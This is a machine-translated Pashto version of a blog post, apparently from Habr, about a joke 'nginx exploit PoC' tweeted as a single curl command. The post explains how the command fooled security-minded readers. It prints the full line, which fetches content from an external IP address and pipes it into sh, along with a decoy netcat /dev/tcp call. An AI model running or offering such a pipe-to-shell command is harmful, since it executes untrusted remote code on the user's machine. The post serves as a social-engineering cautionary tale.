نوټ. ژباړه:
TL؛ DR: په هیڅ حالت کې په sh یا bash کې د فایل پایپ لاین مه کاروئ. دا ستاسو د کمپیوټر کنټرول له لاسه ورکولو عالي لاره ده.
زه غواړم تاسو سره د مزاحیہ PoC استحصال په اړه یوه لنډه کیسه شریک کړم چې د می په 31 رامینځته شوی. هغه د خبرونو په ځواب کې سمدستي راڅرګند شو
په curl کې د نوي مغشوش کولو تخنیک باندې د کار کولو پای ته رسیدو سره ، ما اصلي ټویټ حواله کړ او "یو کاري PoC لیک یې کړ" چې د کوډ یو واحد کرښه لري چې ګمان کیږي د کشف شوي زیان څخه ګټه پورته کوي. البته، دا په بشپړه توګه بې مانا وه. ما ګومان وکړ چې زه به سمدلاسه افشا شم ، او دا چې په غوره توګه به زه یو څو ریټویټونه ترلاسه کړم (او ښه).
په هرصورت، ما تصور نه شو کولی چې وروسته څه پیښ شي. زما د ټویټ شهرت آسمان ته ورسید. په حیرانتیا سره، اوس مهال (15:00 د مسکو وخت د جون 1) لږ شمیر خلک پوه شوي چې دا جعلي دی. ډیری خلک پرته له دې چې چیک کړي یې بیا ټویټ کوي (یوازې پریږدئ چې د ښکلي ASCII ګرافیکونو ستاینه وکړئ چې دا یې تولیدوي).
یوازې وګورئ چې دا څومره ښکلی دی!
پداسې حال کې چې دا ټول لوپونه او رنګونه عالي دي ، دا روښانه ده چې خلک باید د دوی لیدلو لپاره په خپل ماشین کې کوډ چل کړي. خوشبختانه، براوزرونه ورته کار کوي، او د دې حقیقت سره یوځای چې زه واقعیا نه غواړم قانوني ستونزې ته ورسیږم، زما په سایټ کې ښخ شوی کوډ یوازې د اکو تلیفونونه کول پرته له دې چې کوم اضافي کوډ نصب یا اجرا کړي.
یو کوچنی انحراف:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
ټولنیز - بریښنایی انجینري (SEE) - یوازې د فشینګ څخه ډیر
خوندیتوب او پیژندنه د دې تجربې لویه برخه وه. زما په اند دوی هغه څه دي چې د هغه بریالیتوب لامل شوی. د کمانډ لاین په واضح ډول د "127.0.0.1" (د پیژندل شوي ځایی کوربه) په حواله امنیت په کلکه معنی لري. Localhost خوندي ګڼل کیږي او پدې کې ډاټا هیڅکله ستاسو کمپیوټر نه پریږدي.
پیژندنه د تجربې دوهم کلیدي SEE برخه وه. څرنګه چې په نښه شوي لیدونکي په اصل کې د کمپیوټر امنیت اساساتو سره آشنا خلکو څخه جوړ وو، نو دا مهمه وه چې کوډ جوړ کړئ ترڅو د هغې برخې پیژندل شوي او پیژندل شوي (او له همدې امله خوندي وي). د پخوانیو استحصالي مفکورو څخه د عناصرو پور اخیستل او په غیر معمولي ډول سره یوځای کول خورا بریالي ثابت شوي.
لاندې د یو لاینر مفصل تحلیل دی. په دې لیست کې هرڅه اغوندي کاسمیټیک طبیعت، او په عملي توګه د دې اصلي عملیاتو لپاره هیڅ شی ته اړتیا نشته.
کوم اجزا واقعیا اړین دي؟ دا -gsS
, -O 0x0238f06a
, |sh
او پخپله ویب سرور. د ویب سرور هیڅ ناوړه لارښوونې نه درلودې، مګر په ساده ډول د کمانډونو په کارولو سره د ASCII ګرافیک خدمت کوي echo
په سکریپټ کې شامل دي index.html
. کله چې کارونکي سره کرښه داخله کړه |sh
په منځ کې، index.html
بار شوی او اعدام شوی. خوشبختانه، د ویب سرور ساتونکي هیڅ ناوړه اراده نه درلوده.
-
../../../%00
- د لارښود څخه هاخوا استازیتوب کوي؛ -
ngx_stream_module.so
- د تصادفي NGINX ماډل ته لاره؛ -
/bin/sh%00<'protocol:TCP'
- موږ فکر کوو پیل کوو/bin/sh
په هدف ماشین کې او محصول د TCP چینل ته لیږل؛ -
-O 0x0238f06a#PLToffset
- پټ اجزا، ضمیمه#PLToffset
د حافظې په څیر ښکاري چې په PLT کې یو څه شتون لري؛ -
|sh;
- بله مهمه برخه. موږ اړتیا درلوده چې محصول sh/bash ته واړوو ترڅو کوډ اجرا کړو چې د برید کونکي ویب سرور څخه راځي0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- یو ډمی چې netcat ته اشاره کوي/dev/tcp/localhost
نو هر څه بیا خوندي ښکاري. په حقیقت کې، دا هیڅ نه کوي او د ښکلا لپاره په کرښه کې شامل دي.
دا د یوې کرښې سکریپټ کوډ کولو او د "ټولنیز - بریښنایی انجینرۍ" (پیچلي فشینګ) د اړخونو بحث پای ته رسوي.
د ویب سرور ترتیب او ضد اقدامات
څرنګه چې زما ډیری پیرودونکي infosec/hackers دي، ما پریکړه وکړه چې ویب سرور د دوی په برخه کې د "ګټو" څرګندونو ته یو څه نور مقاومت وکړي، یوازې د دې لپاره چې هلکان یو څه وکړي (او دا به په زړه پورې وي. چمتو کول). زه دلته ټول زیانونه لیست نه کړم ځکه چې تجربه لاهم روانه ده، مګر دلته یو څو شیان دي چې سرور یې کوي:
- په فعاله توګه په ځینو ټولنیزو شبکو کې د توزیع هڅې څاري او د بیاکتنې مختلف تمبیلونه ځای په ځای کوي ترڅو کاروونکي وهڅوي چې لینک باندې کلیک وکړي.
- د شیل سکریپټ ښودلو پرځای د Thugcrowd پروموشنل ویډیو ته Chrome/Mozilla/Safari/etc ته لارښوونه کوي.
- د مداخلې / ښکاره هیکنګ ښکاره نښو لپاره ګوري، او بیا د NSA سرورونو ته د غوښتنو لیږل پیل کوي (ha!).
- په ټولو کمپیوټرونو کې د ټروجن او همدارنګه د BIOS روټکیټ نصبوي چې کاروونکي یې د منظم براوزر څخه کوربه ته مراجعه کوي (یوازې ټوکې کول!).
د antimers یوه کوچنۍ برخه
په دې حالت کې، زما یوازینۍ موخه دا وه چې د اپاچي ځینې ځانګړتیاوې ماسټر کړم - په ځانګړې توګه، د غوښتنو د لیږلو لپاره غوره قواعد - او ما فکر کاوه: ولې نه؟
د NGINX استحصال (حقیقي!)
ګډون وکړئ
سرچینه: www.habr.com